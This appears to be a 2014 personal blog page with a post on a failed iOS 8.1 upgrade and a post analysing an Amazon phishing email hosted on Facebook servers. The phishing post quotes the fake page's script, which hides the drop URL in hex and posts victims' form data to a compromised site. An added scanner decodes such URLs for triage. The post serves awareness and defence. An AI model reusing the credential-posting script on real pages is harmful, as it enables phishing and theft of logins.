A nightmare for an upgrade ....

Written by genuix - 21 October 2014 13:23

What a nightmare just for an upgrade ?!?!?!?!

I was just trying to upgrade my iPhone 6 to the new release 8.1 from Apple that they made available today...

My MacBook Pro was on OS X Mavericks and the hell started...

After downloading the new iOS it pushed it to the phone; up to this point it was OK, and then it rebooted into recovery mode and stayed stuck in this state.

I tried to restore it to see what was going on, but after the reboot for the restoration it got stuck again in recovery mode....

The only way to get it to reboot correctly was to close iTunes, stay connected to the MacBook and hold the home and start buttons.

Then it came back to the basic out-of-the-box state and I had to restore the backup from iCloud (fortunately I had one).

And the iPhone keeps rebooting in recovery mode every hours .......

If you try the upgrade without being fully certain that your iCloud backup is configured correctly and that the backup is fresh, then DON'T !!!

Be very careful with it, and my best advice is, as usual, to wait at least 2 or 3 days before applying any upgrade.



Filed under: Home - Tags: iPhone upgrade IOS 8.1 -

AmaZon Phishing hosted by Facebook Servers

Written by genuix - 02 October 2014 14:38

A strange email landed in my mailbox yesterday,

Subject : Problem with your billing

From :

Fortunately I'm on a Linux workstation and Thunderbird didn't automatically load any link or attachment.....

Nonetheless, that's not everybody's case, so ... (maybe sometime ...)

As usual I took a quick look at the items that were not loaded, and what got my attention was the URL. I don't analyze all the spam or phishing email I get in my mailbox, but sometimes it's interesting and I go further...

My point is to make people aware and careful.

The email itself contains only an image loaded from the same source server as the phishing page (but on a different URI):

image loaded by the mail from FACEBOOK server

The danger here is that it's hosted on FACEBOOK® !!!!

It is dangerous because FB is a "safe place" to host, given its worldwide high-availability capability.

The point here is that the page is not interpreted code nor an executed script of any kind; it is downloaded by the user, "automatically" in most cases for the user's convenience, and shown in the web browser.

Here is the core of the email: it only loads an image inside an href tag; when the image is clicked, the HTML file is downloaded from FACEBOOK® itself:

Content-Type: text/plain;
Content-Transfer-Encoding: 7bit

they're here
< https [:] / / www[.]facebook[.]com / download / {FACEBOOK-USER-NUMBER} / PP_NNN_NNN_NNN_NNN[.]html >

Content-Type: text/html
Content-Transfer-Encoding: 7bit

<A href="https [:] / / www[.]facebook[.]com / download / {FACEBOOK-USER-NUMBER} / PP_002_054_171_429[.]html">
<IMG alt="they're here" src="https [:] / / www[.]facebook[.]com / download / {FACEBOOK-USER-NUMBER} / zonzon[.]jpg">

Then a well-designed fake Amazon page, "Amazon.com|Verification", served from the FACEBOOK® download servers:

Amazon fake sign-in image

Then, when completed, the form sends a formatted query to a pirated web site located in Spain, about interpreting dreams....

In the page source there is a function that encodes the final URL to which the information submitted by the user (if any) is sent:

var symbols = " !\"#$%&'()*+,-./0123456789:;<=>?@";
var loAZ = "abcdefghijklmnopqrstuvwxyz";
symbols+= loAZ.toUpperCase();
symbols+= "[\\]^_`";
symbols+= loAZ;
symbols+= "{|}~";
	valueStr = "68:74:74:70:3a:2f:2f:65:6f:66:64:72:65:61:6d:73:2e:65:73:79:2e:65:73:2f:69:6e:64:65:78:5f:66:69:6c:65:73:2f:73:65:6e:64:32:2e:70:68:70";
	valueStr = valueStr.toLowerCase();
    var hex = "0123456789abcdef";
	var text = "";
	var i=0;

	// Walk the string two hex digits at a time, skipping the ':' separators
	for( i=0; i<valueStr.length; i=i+2 ){
		var char1 = valueStr.charAt(i);
		if ( char1 == ':' ){
			i++;
			char1 = valueStr.charAt(i);
		}
		var char2 = valueStr.charAt(i+1);
		var num1 = hex.indexOf(char1);
		var num2 = hex.indexOf(char2);
		// Combine the two nibbles into one byte value
		var value = num1 << 4;
		value = value | num2;

		var valueInt = parseInt(value);
		var symbolIndex = valueInt - 32;
		var ch = '?';
		// Printable ASCII (32..126) is looked up in the symbols table
		if ( symbolIndex >= 0 && value <= 126 ){
			ch = symbols.charAt(symbolIndex)
		}
		text += ch;
	}
$.post(text, $("#mycontactform").serialize(),  function(response) {
return false;

The decoded string gives:
http[:] / / eofdreams[.]esy[.]es / index_files / send2[.]php
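
For triage of similar pages, the decoding step above can be automated. The following is an added example, not code from the original post or from the phishing page: it scans page source for colon-separated hex strings, decodes them and reports any that turn out to be URLs, defanged. The function names, the 8-byte minimum length and the `hxxp` defang style are assumptions of this example.

```javascript
// Added example (not from the post): find and decode colon-separated hex strings.
// SAMPLE_SOURCE is a constructed page fragment; only the valueStr literal is the post's.
const SAMPLE_SOURCE = `
<script>
var loAZ = "abcdefghijklmnopqrstuvwxyz";
valueStr = "68:74:74:70:3a:2f:2f:65:6f:66:64:72:65:61:6d:73:2e:65:73:79:2e:65:73:2f:69:6e:64:65:78:5f:66:69:6c:65:73:2f:73:65:6e:64:32:2e:70:68:70";
var hex = "0123456789abcdef";
</script>`;

// One hex byte followed by at least 7 more ":hh" groups, so 6-byte MAC
// addresses and hh:mm:ss timestamps are not reported.
const HEX_RUN = /\b[0-9a-f]{2}(?::[0-9a-f]{2}){7,}\b/gi;

// Decode "68:74:..." to text, keeping the page decoder's 32..126 window.
function decodeHexRun(run) {
  return run.split(':').map((h) => {
    const code = parseInt(h, 16);
    return code >= 32 && code <= 126 ? String.fromCharCode(code) : '?';
  }).join('');
}

// Make a URL non-clickable before it goes into a ticket or report.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// Return every hex run in `source` that decodes to an http(s) URL.
function findEncodedUrls(source) {
  const findings = [];
  for (const match of source.matchAll(HEX_RUN)) {
    const decoded = decodeHexRun(match[0]);
    if (/^https?:\/\//i.test(decoded)) {
      findings.push({ offset: match.index, defanged: defang(decoded) });
    }
  }
  return findings;
}

console.log(findEncodedUrls(SAMPLE_SOURCE));
```

A hit only shows that the page hides a URL in this encoding; whether form data is posted to it still has to be confirmed by reading the surrounding script.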


Video of the PoC made by friends:

I even tried to shout at Facebook and Amazon, but there is still no answer and the pages are still online....

urlQuery result on the landing page where the user's information is sent after the form is completed:



Filed under: Home, Scam - Tags: amazon facebook malwaremustdie malware phishing -


